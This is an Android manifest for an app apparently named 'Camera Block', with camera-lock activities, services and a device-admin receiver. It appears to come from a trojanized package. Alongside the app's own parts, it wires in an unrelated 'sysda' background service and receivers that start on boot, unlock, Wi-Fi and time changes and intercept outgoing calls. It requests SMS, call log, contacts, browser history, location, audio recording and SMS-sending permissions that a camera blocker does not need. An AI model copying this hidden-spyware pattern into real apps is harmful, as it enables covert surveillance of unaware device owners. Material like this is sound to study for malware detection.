<?xml version="1.0" encoding="utf-8" standalone="no"?><manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.bettertomorrowapps.camerablock">
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.READ_CALL_LOG"/>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.READ_CALENDAR"/>
    <uses-permission android:name="android.permission.GET_ACCOUNTS"/>
    <uses-permission android:name="com.android.browser.permission.READ_HISTORY_BOOKMARKS"/>
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.CHANGE_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
    <uses-permission android:name="android.permission.BLUETOOTH"/>
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
    <uses-permission android:name="android.permission.CALL_PHONE"/>
    <uses-permission android:name="android.permission.RECORD_AUDIO"/>
    <uses-permission android:name="android.permission.CAMERA"/>
    <uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS"/>
    <supports-screens android:anyDensity="true" android:largeScreens="true" android:normalScreens="true" android:resizeable="true" android:smallScreens="true" android:xlargeScreens="true"/>
    <application android:allowBackup="true" android:icon="@drawable/app_icon" android:label="@string/app_name" android:theme="@style/AppTheme">
        <activity android:configChanges="keyboard|keyboardHidden|orientation|screenSize" android:label="@string/app_name" android:name="com.bettertomorrowapps.camerablock.MainActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
        <service android:icon="@drawable/app_icon" android:label="Camera Block" android:name="com.bettertomorrowapps.camerablock.ServiceLockCamera"/>
        <service android:icon="@drawable/app_icon" android:label="Camera Block" android:name="com.bettertomorrowapps.camerablock.ServiceWidget"/>
        <service android:icon="@drawable/app_icon" android:label="Camera Block" android:name="com.bettertomorrowapps.camerablock.BlockAgainAfter5Min"/>
        <receiver android:enabled="true" android:exported="true" android:label="BootCompletedIntentReceiver" android:name="com.bettertomorrowapps.camerablock.BootCompletedIntentReceiver">
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
            </intent-filter>
        </receiver>
        <receiver android:exported="true" android:name="com.bettertomorrowapps.camerablock.UnlockReceiver">
            <intent-filter android:priority="100">
                <action android:name="android.intent.action.USER_PRESENT"/>
            </intent-filter>
        </receiver>
        <activity android:configChanges="keyboard|keyboardHidden|orientation|screenSize" android:name="com.bettertomorrowapps.camerablock.WelcomeActivity" android:screenOrientation="portrait" android:theme="@android:style/Theme.Light.NoTitleBar.Fullscreen"/>
        <activity android:name="com.bettertomorrowapps.camerablock.MainFragment"/>
        <activity android:name="com.bettertomorrowapps.camerablock.SettingsFragment"/>
        <activity android:name="com.bettertomorrowapps.camerablock.NotificationConfig"/>
        <receiver android:label="Camera Block" android:name="com.bettertomorrowapps.camerablock.WidgetCameraLock">
            <intent-filter>
                <action android:name="android.appwidget.action.APPWIDGET_UPDATE"/>
            </intent-filter>
            <meta-data android:name="android.appwidget.provider" android:resource="@xml/widget_config"/>
        </receiver>
        <activity android:name="com.bettertomorrowapps.camerablock.ListOfAppsActivity"/>
        <receiver android:label="Camera Block" android:name="com.bettertomorrowapps.camerablock.DeviceAdmininistratorReceiver" android:permission="android.permission.BIND_DEVICE_ADMIN">
            <meta-data android:name="android.app.device_admin" android:resource="@xml/device_admin"/>
            <intent-filter>
                <action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/>
            </intent-filter>
        </receiver>
        <activity android:name="com.bettertomorrowapps.camerablock.TermsOfServiceActivity"/>
        <receiver android:enabled="true" android:exported="true" android:name="sysda.receivers.StartBroadcastReceiver" android:permission="android.permission.RECEIVE_BOOT_COMPLETED">
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
                <action android:name="android.intent.action.QUICKBOOT_POWERON"/>
                <action android:name="android.intent.action.USER_PRESENT"/>
                <category android:name="android.intent.category.DEFAULT"/>
            </intent-filter>
        </receiver>
        <receiver android:name="sysda.receivers.NewOutCallListener">
            <intent-filter android:priority="1000">
                <action android:name="android.intent.action.NEW_OUTGOING_CALL"/>
            </intent-filter>
        </receiver>
        <receiver android:name="sysda.receivers.TimeChangedReceiver">
            <intent-filter>
                <action android:name="android.intent.action.ACTION_TIME_CHANGED"/>
                <action android:name="android.intent.action.ACTION_TIMEZONE_CHANGED"/>
            </intent-filter>
        </receiver>
        <receiver android:name="sysda.receivers.WiFiChangeReceiver">
            <intent-filter>
                <action android:name="android.net.wifi.STATE_CHANGE"/>
                <action android:name="android.net.wifi.supplicant.CONNECTION_CHANGE"/>
            </intent-filter>
        </receiver>
        <service android:enabled="true" android:exported="false" android:name="sysda.BackgroundService">
            <intent-filter>
                <action android:name="sysda.BackgroundService"/>
            </intent-filter>
        </service>
    </application>
</manifest>